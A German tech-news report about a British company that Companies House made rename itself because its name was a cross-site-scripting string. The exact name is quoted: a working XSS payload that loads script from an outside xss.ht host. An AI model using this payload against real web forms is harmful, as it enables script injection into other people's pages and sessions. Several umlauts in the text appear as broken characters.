Firma musste Namen �ndern, weil er gef�hrlichen Code enth�lt

Bild: Pixabay

Der Name einer britischen Firma stellte ein potenzielles Sicherheitsrisiko dar und wurde geändert.

Eine britische Software-Beratungsfirma wurde von der dortigen Handelsregister-Behörde Companies House gezwungen, ihren Namen zu ändern. Der Grund: Er bestand aus HTML-Code und könne als Exploit gegen Webseiten eingesetzt werden, die ihre Webformulare nicht ausreichend gegen Cross-Site-Scripting-Angriffe (XSS) schützen.

Der Originalname:

Code:

""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD"

So wie jene der Behörde, wie The Guardian schreibt.

Die Eingabe des Namens in ein ungesichertes Textfeld kann begünstigen, dass die dahinterliegende Anwendung glaubt, dass es sich nicht um einen Firmennamen handle, sondern diesen als HTML-Code interpretiert und ausführt. Dies kann auch in Form eines Skripts hinter einer URL erfolgen. Laut der britischen Zeitung habe das hinterlegte Skript lediglich eine harmlose Warnung ausgegeben.

Mehr dazu findest Du auf futurezone.at

Autor schreiben

Kurze URL:

Currently 3.00/5
1
2
3
4
5

Bewertung: 3.0/5 (3 Stimmen)

Das k�nnte Dich auch interessieren:

TikTok soll abgedreht werden, bevor es einer US-Firma in die H�nde f�llt
Laut Insidern zieht ByteDance drastische Ma�nahmen, um seinen Algorithmus zu sch�tzen.

Reddit verkauft Inhalte als Trainingsdaten an gro�e KI-Firma
Um 60 Millionen Dollar j�hrlich darf eine nicht genanntes, gro�es KI-Unternehmen seine Software mit Reddit-Inhalten trainieren.

�hnliche News:

Cyberangriff auf steirische IT-Firma
Musks Ki-Firma will Chatbot Grok zu Open Source machen
Robotersaugerfirma iRobot k�mpft mit Umsatzr�ckgang und roten Zahlen
Chipfirma Arm profitiert von KI-Gesch�ft
Aircar: Chinesische Firma erwirbt europ�isches Flugauto
Firma hinter Kryptow�hrung TerraUSD meldet Insolvenz an
Hyperverse: Krypto-Firma soll sich ihren CEO nur ausgedacht haben
Slowenische Firma errichtet Tesla-Batteriespeicher in K�rnten
Chinesische Firma errichtet 16-Megawatt-Windrad in 24 Stunden
Robotaxi-Firma Cruise passt Software nach Unfall mit Fu�g�ngerin an

Weitere News:

"Finger-Guillotine": Cybertruck trennte fast Finger von YouTuber ab
Microsoft warnt vor Angriffswelle auf Android-Apps
Candy Crush: Priester soll Kirchengelder f�r Handyspiele veruntreut haben
Googles Pixel 8a komplett geleakt
Kasperskys KI angeblich in russischen Milit�rdrohnen
Firefox-Userin l�sst 7.400 Tabs offen
Pok�mon-Spieler erstellen Fake-Str�nde bei Openstreetmap
Microsoft erkl�rt Security zu seiner Top-Priorit�t
Neues Tool soll politische Deepfakes enttarnen
Chinesisches E-Auto f�r 14.500 Euro wird in Deutschland verkauft

Einen Kommentar schreiben

Kommentare

(0)

Bitte bleibe sachlich und fair in deinen �u�erungen. Sollte dein Kommentar nicht sofort erscheinen, ist er in der Warteschlange gelandet und wird meist zeitnah freigeschaltet.

Kommentare:

Leider hast du das Java-Plugin deaktiviert...
Die Kommentarfunktion brauch das Java Plugin aber...

Du kannst aber gerne �ber das Forum Newskommentare schreiben...

Du hast bereits f�r diesen Kommentar angestimmt...

;-)

Top